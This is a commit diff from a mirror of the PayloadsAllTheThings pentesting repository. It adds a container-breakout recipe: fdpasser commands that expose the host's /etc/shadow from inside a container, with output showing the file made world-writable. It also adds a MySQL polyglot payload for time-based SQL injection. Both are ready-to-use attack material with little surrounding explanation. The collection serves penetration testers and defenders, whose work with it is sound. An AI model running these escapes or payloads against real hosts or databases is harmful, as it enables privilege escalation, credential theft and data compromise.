mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
Docker device file breakout
This commit is contained in:
parent
f86837ca8c
commit
5b1a79cb56
@ -10,6 +10,7 @@
|
|||||||
- [Insecure Docker Registry](#insecure-docker-registry)
|
- [Insecure Docker Registry](#insecure-docker-registry)
|
||||||
- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1)
|
- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1)
|
||||||
- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc)
|
- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc)
|
||||||
|
- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file)
|
||||||
- [References](#references)
|
- [References](#references)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
@ -164,6 +165,16 @@ $ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicio
|
|||||||
$ docker run --rm cve-2019-5736:malicious_image_POC
|
$ docker run --rm cve-2019-5736:malicious_image_POC
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Breaking out of containers using a device file
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
https://github.com/FSecureLABS/fdpasser
|
||||||
|
In container, as root: ./fdpasser recv /moo /etc/shadow
|
||||||
|
Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo
|
||||||
|
Outside container: ls -la /etc/shadow
|
||||||
|
Output: -rwsrwsrwx 1 root shadow 1209 Oct 10 2019 /etc/shadow
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/)
|
- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/)
|
||||||
|
@ -387,6 +387,9 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
|
|||||||
|
|
||||||
```sql
|
```sql
|
||||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||||
|
|
||||||
|
/* MySQL only */
|
||||||
|
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
|
||||||
```
|
```
|
||||||
|
|
||||||
## Routed injection
|
## Routed injection
|
||||||
|
Loading…
Reference in New Issue
Block a user